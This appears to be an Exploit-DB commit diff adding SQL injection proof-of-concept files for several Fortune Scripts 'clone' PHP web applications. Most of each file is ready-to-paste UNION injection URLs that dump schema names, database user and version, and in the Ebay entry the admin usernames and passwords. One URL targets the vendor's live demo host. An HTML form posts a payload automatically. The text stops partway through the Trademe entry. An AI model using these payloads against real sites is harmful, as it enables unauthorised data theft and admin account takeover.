DB: 2017-12-10

20 changes to exploits/shellcodes FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection FS Grubhub Clone 1.0 - 'keywords' SQL Injection FS Groupon Clone 1.0 - 'id' SQL Injection FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection FS Amazon Clone 1.0 - SQL Injection FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection FS Foodpanda Clone 1.0 - SQL Injection Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection
2017-12-10 05:02:21 +00:00 · 2017-12-10 05:02:21 +00:00 · 97b5f8cc5b
commit 97b5f8cc5b
parent c35d9b35f7
21 changed files with 767 additions and 0 deletions
--- a/exploits/php/webapps/43246.txt
+++ b/exploits/php/webapps/43246.txt
@ -0,0 +1,36 @@
+# # # # # 
+# Exploit Title: FS Makemytrip Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/makemytrip-clone/
+# Demo: http://makemytrip-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/show-flight-result.php?&fl_orig=[SQL]
+# 
+# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+# 
+# http://server/show-flight-result.php?&fl_orig=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+# 
+# 2)
+# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL]
+# 
+# 27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+# 
+# http://server/show-flight-result.php?fl_dest=27'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(25),(26),(27),(28))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43249.txt
+++ b/exploits/php/webapps/43249.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: FS Linkedin Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/linkedin-clone/
+# Demo: http://linkedin-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/group.php?grid=[SQL]
+# 
+# -1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+-
+# 
+# http://server/group.php?grid=-1'++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14--+-
+# 
+# 2)
+# http://localhost/[PATH]/profile.php?fid=[SQL]
+# 
+# -44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+-
+# 
+# http://server/profile.php?fid=-44'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11))--+-
+# 
+# 3)
+# http://localhost/[PATH]/company_details.php?id=[SQL]
+# 
+# -9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+-
+# 
+# http://server/company_details.php?id=-9491e369853df766fa44e1ed0ff613f563bd'++UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),4,5,6,7--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43250.txt
+++ b/exploits/php/webapps/43250.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: FS Indiamart Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/indiamart-clone/
+# Demo: http://indiamart-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/catcompany.php?token=[SQL]
+# 
+# -7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+-
+# 
+# http://server/catcompany.php?token=-7219b53b3a3d6ab90ce0268229151c9bde11'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(3),(4),(5),(6))--+-
+# 
+# 2)
+# http://localhost/[PATH]/buyleads-details.php?id=[SQL]
+# 
+# -9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+-
+# 
+# http://server/buyleads-details.php?id=-9586c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47))--+-
+# 
+# 3)
+# http://localhost/[PATH]/company/index.php?c=[SQL]
+# 
+# -5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+-
+# 
+# http://server/company/index.php?c=-5471c4ca4238a0b923820dcc509a6f75849b'++UNION(SELECT(1),(2),(3),(4),(5),(6),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43251.txt
+++ b/exploits/php/webapps/43251.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: FS IMDB Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/imdb-clone/
+# Demo: http://imdb-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/movie.php?f=[SQL]
+# 
+# -10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+-
+# 
+# http://server/movie.php?f=-10++UNION(SELECT(1),(2),(3),(4),(5),(6),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34))--+-
+# 
+# 2)
+# http://localhost/[PATH]/tvshow.php?s=[SQL]
+# 
+# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+-
+# 
+# http://server/tvshow.php?s=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+-
+# 
+# 3)
+# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
+# 
+# -1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+-
+# 
+# http://server/show_misc_video.php?id=-1++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43252.html
+++ b/exploits/php/webapps/43252.html
@ -0,0 +1,30 @@
+<!--
+# # # # # 
+# Exploit Title: FS Grubhub Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/grubhub-clone/
+# Demo: http://grubhub-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+-->
+<html>
+<body>
+<form action="http://server/food/" method="post">
+<input name="keywords" id="keywords" type="text" value="' UNION ALL SELECT 1,2,3,CONCAT(0x494853414e2053454e43414e),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Ver Ayari">
+<button type="submit">Ver Ayari</button>
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/43253.txt
+++ b/exploits/php/webapps/43253.txt
@ -0,0 +1,36 @@
+# # # # # 
+# Exploit Title: FS Groupon Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/groupon-clone/
+# Demo: http://groupon-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/item_details.php?id=[SQL]
+# 
+# -1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+-
+# 
+# http://server/item_details.php?id=-1++UNION+ALL+SELECT+1,2,3,4,5,6,7,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),9,10,11,12,13,14,15,16,17--+-
+# 
+# 2)
+# http://localhost/[PATH]/vendor_details.php?id=[SQL]
+# 
+# -2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+-
+# 
+# http://server/vendor_details.php?id=-2++UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),5,6,7,8,9,10,11,12,13,14,15--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43254.txt
+++ b/exploits/php/webapps/43254.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: FS Gigs Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/gigs-script/
+# Demo: http://gigs.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/browse-category.php?cat=[SQL]
+# 
+# -83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+-
+# 
+# http://server/browse-category.php?cat=-83c4ca4238a0b923820dcc509a6f75849b'++/*!50000UNION*/+/*!50000SELECT*/+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5--+-
+# 
+# 2)
+# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
+# 
+# -53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+-
+# 
+# http://server/browse-scategory.php?sc=-53c81e728d9d4c2f636f067f89cc14862c'++UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10))--+-
+# 
+# 3)
+# http://localhost/[PATH]/service-provider.php?ser=[SQL]
+# 
+# -1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-
+# 
+# http://gigs.demonstration.co.in/service-provider.php?ser=-1873'+UNION(SELECT(1),(2),(3),(4),(5),(6),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43255.txt
+++ b/exploits/php/webapps/43255.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: FS Freelancer Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/freelancer-clone/
+# Demo: http://freelancer-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/profile.php?u=[SQL]
+# 
+# -c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+-
+# 
+# http://server/profile.php?u=-c4ca4238a0b923820dcc509a6f75849b'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43256.txt
+++ b/exploits/php/webapps/43256.txt
@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: FS Ebay Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/ebay-clone/
+# Demo: http://ebay-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/product.php?id=[SQL]
+# 
+# -9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+-
+# 
+# http://server/product.php?id=-9++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20))--+-
+# 
+# 2)
+# http://localhost/[PATH]/search.php?category_id=1&sub_category_id=[SQL]
+# 
+# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# http://server/search.php?category_id=1&sub_category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# 3)
+# http://localhost/[PATH]/search.php?category_id=[SQL]
+# 
+# -1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# http://server/search.php?category_id=-1++UNION(SELECT(1),(2),(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+admin),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43257.txt
+++ b/exploits/php/webapps/43257.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: FS Crowdfunding Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/crowdfunding-script/
+# Demo: http://crowdfunding.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/latest_news_details.php?id=[SQL]
+# 
+# -4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# http://server/latest_news_details.php?id=-4'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43258.txt
+++ b/exploits/php/webapps/43258.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: FS Care Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/care-clone/
+# Demo: http://care-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/searchJob.php?jobType=[SQL]&jobFrequency=[SQL]
+# 
+# # # # #
--- a/exploits/php/webapps/43259.txt
+++ b/exploits/php/webapps/43259.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: FS Amazon Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/amazon-clone/
+# Demo: http://amazon-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/p/VerAyari/[SQL]
+# 
+# -9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# http://server/p/VerAyari/-9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43260.txt
+++ b/exploits/php/webapps/43260.txt
@ -0,0 +1,36 @@
+# # # # # 
+# Exploit Title: FS Trademe Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/trademe-clone/
+# Demo: http://trademe-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/search_item.php?search=[SQL]
+# 
